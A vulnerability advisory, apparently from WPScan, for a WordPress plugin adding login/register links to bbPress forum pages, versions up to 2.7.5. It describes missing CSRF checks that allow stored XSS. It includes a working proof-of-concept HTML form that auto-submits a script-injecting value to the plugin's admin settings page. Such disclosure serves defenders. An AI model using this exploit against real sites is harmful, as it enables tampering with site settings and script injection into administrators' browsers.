bbPress Login Register Links On Forum Topic Pages <= 2.7.5 - CSRF to Stored XSS



Description
Lack of CSRF checks in the plugin's settings allow arbitrary change of the settings, which can also lead to stored XSS issues.
Proof of Concept
The payload below will result in a stored XSS in the 'Style Customize' page.

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bbPressCustomPage" method="POST">
      <input type="hidden" name="bbpresscustomcss" value="</textarea><svg/onload=alert(/XSS/)>" />
      <input type="hidden" name="bpoptionsettinspanelsubmit" value="Submit" />
    </form>
  </body>
</html>

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/2217772

Classification

Type MULTI

Miscellaneous

Views 167164
Verified Yes
WPVDB ID 9983

Timeline

Publicly Published 2019-12-25 (5 months ago)
Added 2019-12-26 (5 months ago)
Last Updated 2019-12-26 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin